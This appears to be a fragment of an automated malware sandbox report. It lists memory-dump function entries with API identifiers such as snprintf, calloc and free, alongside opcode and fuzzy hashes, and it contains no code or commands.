                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ErrorR_snprintf
                                                            • String ID: %d.%d
                                                            • API String ID: 2298970422-3954714993
                                                            • Opcode ID: 27301257d4192a18aebcf5828d0514daa93cde53f80cb3b735015dbe62d83e01
                                                            • Instruction ID: 14a6a7d1452c3bdf787414603d29b82677bea9b2de9e48d22e3c1c786947bef0
                                                            • Opcode Fuzzy Hash: 27301257d4192a18aebcf5828d0514daa93cde53f80cb3b735015dbe62d83e01
                                                            • Instruction Fuzzy Hash: 9431FCB2D042586BFB109BA19C05BFF776CDF40308F454469ED199B781EB309969CBA1
                                                            Function 6CA60DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Value$calloc
                                                            • String ID:
                                                            • API String ID: 3339632435-0
                                                            • Opcode ID: d314520e47005a2e3989d97a6946b9ef8001ff3704cd7ab098d235e2412586a7
                                                            • Instruction ID: ad7c27b0ff039329f71bab8fdfaefd74f961e9102366a9062dc1f31af27d5d51
                                                            • Opcode Fuzzy Hash: d314520e47005a2e3989d97a6946b9ef8001ff3704cd7ab098d235e2412586a7
                                                            • Instruction Fuzzy Hash: D531E4716443A1CFEB006F3AC9842697BB8FF1A308F054669D89887E61EB34D0D5CB86
                                                            Function 6CA11EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free
                                                            • String ID:
                                                            • API String ID: 1294909896-0
                                                            • Opcode ID: ed8a5f3697bd95c2cc7e0ccc6caf95d04cdb0a2a7bba051966be2a4e1389c9a5
                                                            • Instruction ID: aebeb7e94e6599cebccb3374db93ec0b81c7d2b7af9d25b29753546fdbe77225
                                                            • Opcode Fuzzy Hash: ed8a5f3697bd95c2cc7e0ccc6caf95d04cdb0a2a7bba051966be2a4e1389c9a5
                                                            • Instruction Fuzzy Hash: 9EF0B4B57045016BEB009F65DC45D37777CEF45594B080425ED09C3E00D725F450C6A1